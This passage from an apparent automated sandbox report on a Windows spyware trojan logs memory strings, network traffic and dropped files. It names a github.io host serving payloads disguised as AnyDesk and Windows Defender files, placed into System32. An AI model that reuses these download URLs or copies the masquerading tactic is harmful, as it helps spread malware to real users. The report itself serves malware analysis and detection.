Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllges
Source: AnyDeskUpdateService.exe, 00000088.00000002.2580124899.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllhttps://duy-thanh.github.io/file/AnyDesk
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllmsml
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllz
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17A9000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exe3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeC:
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exedf-msMo
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeml
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeup
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exeString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exep
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exev
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt%l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt.dll
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt8Y
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt9c4a2f8b514.cdf-msMo
Source: MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387459125.00007FF76E181000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtC:
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B178A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B1789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtD
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtX
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/AnyDeskCrashHandler.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/version.txt3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/version.txteService.exe3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txte1
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtr
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtt
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Conhost.exeProcess created: 46
Source: sc.exeProcess created: 50
Source: conhost.exeProcess created: 67
Source: cmd.exeProcess created: 118
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\WindowsUpdate.txtJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\AnyDeskShellIntegration.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\AnyDeskUpdateService.exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\AnyDeskShellIntegration_Update.dllJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile created: C:\Windows\System32\oobe\version.txtJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txtJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeFile created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txtJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78528400_2_00007FF6C7852840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785CDF00_2_00007FF6C785CDF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C788AD680_2_00007FF6C788AD68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78735100_2_00007FF6C7873510
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787E95C0_2_00007FF6C787E95C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786F0F00_2_00007FF6C786F0F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786F9100_2_00007FF6C786F910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785E1300_2_00007FF6C785E130
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785D9200_2_00007FF6C785D920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78845180_2_00007FF6C7884518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787F0640_2_00007FF6C787F064
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78628600_2_00007FF6C7862860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785D0900_2_00007FF6C785D090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787D0A00_2_00007FF6C787D0A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787FFBC0_2_00007FF6C787FFBC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785E0100_2_00007FF6C785E010
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785CF700_2_00007FF6C785CF70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C788A6CC0_2_00007FF6C788A6CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78586D00_2_00007FF6C78586D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78706DC0_2_00007FF6C78706DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786F7040_2_00007FF6C786F704
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7871DCC0_2_00007FF6C7871DCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785D6000_2_00007FF6C785D600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78715900_2_00007FF6C7871590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786F5000_2_00007FF6C786F500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7874D280_2_00007FF6C7874D28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787D5340_2_00007FF6C787D534
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78845180_2_00007FF6C7884518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78794A00_2_00007FF6C78794A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78854100_2_00007FF6C7885410
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78883480_2_00007FF6C7888348
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785D3500_2_00007FF6C785D350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C787DBB40_2_00007FF6C787DBB4
